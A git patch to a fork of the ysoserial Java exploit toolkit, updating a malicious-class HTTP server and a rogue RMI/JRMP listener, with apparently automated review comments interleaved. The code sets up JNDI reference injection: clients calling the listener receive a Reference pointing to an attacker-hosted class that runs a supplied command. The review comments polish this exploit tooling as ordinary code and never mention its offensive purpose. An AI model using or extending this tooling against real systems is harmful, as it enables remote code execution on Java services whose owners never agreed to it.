From bf95d4aa3ae7291a811da4777c4db8c06c7d3553 Mon Sep 17 00:00:00 2001
From: wh1t3P1g
Date: Wed, 5 Feb 2020 21:12:20 +0800
Subject: [PATCH] update RMIRefListener2
---
 .../ysoserial/exploit/PayloadHTTPServer.java | 22 ++++++++++--
 .../ysoserial/exploit/RMIRefListener2.java | 35 ++++++++++---------
 2 files changed, 37 insertions(+), 20 deletions(-)
diff --git a/src/main/java/ysoserial/exploit/PayloadHTTPServer.java b/src/main/java/ysoserial/exploit/PayloadHTTPServer.java
index b6d55e8c..5b3090f9 100644
--- a/src/main/java/ysoserial/exploit/PayloadHTTPServer.java
+++ b/src/main/java/ysoserial/exploit/PayloadHTTPServer.java
@@ -16,7 +16,18 @@
 * @author wh1t3P1g
 * @since 2020/2/5
 */
-public class PayloadHTTPServer {
+public class PayloadHTTPServer implements Runnable{
+
+ private int port;
+ private String classname;
+ private String command;
+ private HttpServer server;
+
+ public PayloadHTTPServer(int port, String classname, String command) {
+ this.port = port;
+ this.classname = classname;
+ this.command = command;
+ }
 public static void main(String[] args) {
 if ( args.length < 3 ) {
@@ -29,9 +40,14 @@ public static void main(String[] args) {
 String classname = args[1];
 String command = args[2];
+ PayloadHTTPServer server = new PayloadHTTPServer(port, classname, command);
+ server.run();
+ }
+
+ public void run(){
 try {
 System.err.println("* Opening Payload HTTPServer on " + port);
- HttpServer server = HttpServer.create(new InetSocketAddress(port), 0);
+ server = HttpServer.create(new InetSocketAddress(port), 0);
 server.createContext("/"+classname+".class", new PayloadHandler(classname, command));
 server.setExecutor(null);
 server.start();
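Review bot: `run()` is added without `@Override` even though the class now implements `Runnable`, and the three constructor-set fields are left mutable; `private final int port;` (likewise `classname` and `command`) together with `@Override public void run() {` makes the contract explicit. The new `server` field is assigned inside `run()` but nothing in the hunk ever calls `server.stop(...)`, so once started the HTTP listener runs until the process exits; a short comment on the field, or a `stop()` method if callers are expected to tear it down, would document that. `new InetSocketAddress(port)` still binds the wildcard address, so a bind-host parameter would let a caller restrict which interface serves the class file. The class body continues past the hunk.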
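Review bot: The new local in `main`, `PayloadHTTPServer server`, carries the same name as the `HttpServer server` field assigned five lines later in `run()`, so the two `server` references in this hunk read as the same object; renaming the local, `PayloadHTTPServer payloadServer = new PayloadHTTPServer(port, classname, command); payloadServer.run();`, avoids that. Because `run()` reassigns the field on every call, a second `run()` on the same instance would leave the first `HttpServer` running and unreferenced; a guard such as `if (server != null) throw new IllegalStateException("already started");` at the top of `run()` pins the single-use intent. `main` begins before the hunk and `run()`'s `try` block is closed after it.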
@@ -71,7 +87,7 @@ private void generate() throws Exception {
 @Override
 public void handle(HttpExchange exchange) throws IOException {
- System.err.println("Have connection from "+exchange.getRemoteAddress());
+ System.err.println("Have request from "+exchange.getRemoteAddress());
 System.err.println("Get request <"+exchange.getRequestMethod()+"> "+exchange.getRequestURI());
 exchange.sendResponseHeaders(200, obj.length);
 OutputStream os = exchange.getResponseBody();
diff --git a/src/main/java/ysoserial/exploit/RMIRefListener2.java b/src/main/java/ysoserial/exploit/RMIRefListener2.java
index d1e18bdf..c9f86e5d 100644
--- a/src/main/java/ysoserial/exploit/RMIRefListener2.java
+++ b/src/main/java/ysoserial/exploit/RMIRefListener2.java
@@ -9,16 +9,6 @@ import java.rmi.registry.LocateRegistry;
 import java.rmi.registry.Registry;
-
-/**
- * Generic JRMP listener
- *
- * Opens up an JRMP listener that will deliver the specified payload to any
- * client connecting to it and making a call.
- *
- * @author mbechler
- *
- */
 @SuppressWarnings ( { "restriction" } )
@@ -39,20 +29,31 @@ public RMIRefListener2(int port, String factoryName, String factoryURL, Object p
 public static final void main ( final String[] args ) throws Exception{
- if ( args.length < 3 ) {
- System.err.println(RMIRefListener2.class.getName() + " ");
+ if ( args.length < 4 ) {
+ System.err.println(RMIRefListener2.class.getName() + " ");
 System.exit(-1);
 return;
 }
- Reference reference = new Reference(args[ 1 ],args[ 1 ],args[ 2 ]);
+ String[] registry = args[0].split(":");
+ int registryPort = Integer.parseInt(registry[1]);
+ String host = registry[0];
+
+ int httpServerPort = Integer.parseInt(args[1]);
+ String factoryName = args[2];
+ String factoryURL = "http://"+host+":"+httpServerPort+"/";
+ String command = args[3];
+
+ Reference reference = new Reference(factoryName, factoryName, factoryURL);
 final Object payloadObject = new ReferenceWrapper(reference);
 try {
- int port = Integer.parseInt(args[ 0 ]);
- System.err.println("* Opening JRMP listener on " + port);
- System.err.println("* URL: rmi://some-host:"+port+"/"+args[1]);
- RMIRefListener2 c = new RMIRefListener2(port, args[1], args[2], payloadObject);
+ PayloadHTTPServer server = new PayloadHTTPServer(httpServerPort, factoryName, command);
+ server.run();
+ System.err.println("* Opening JRMP listener on " + registryPort);
+ System.err.println("* URL: rmi://"+host+":"+registryPort+"/"+factoryName);
+ System.err.println("* FactoryURL: "+factoryURL);
+ RMIRefListener c = new RMIRefListener(registryPort, payloadObject);
 c.run();
 }
 catch ( Exception e ) {
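Review bot: `args[0].split(":")` is indexed with `registry[1]` and passed to `Integer.parseInt` before any validation, so an argument without a colon or with a non-numeric port fails with an `ArrayIndexOutOfBoundsException` or `NumberFormatException` outside the `try`, instead of the usage message that the `args.length < 4` check prints; add `if (registry.length != 2) { System.err.println("expected host:port, got " + args[0]); System.exit(-1); }` right after the split, and the same kind of check applies to `Integer.parseInt(args[1])`. The rewritten `main` now constructs a `RMIRefListener` and no longer calls the `RMIRefListener2(int, String, String, Object)` constructor visible in the hunk header, so this class's own `factoryName`/`factoryURL` handling appears unused from `main`; either that constructor is now dead or `main` meant to use it, and a comment should say which. `PayloadHTTPServer.run()` is invoked before the JRMP listener starts, but the catch for its `try` block lies outside these hunks; if it swallows a bind failure, the listener still starts advertising a `factoryURL` that nothing serves. `main`'s `catch` block closes after the hunk.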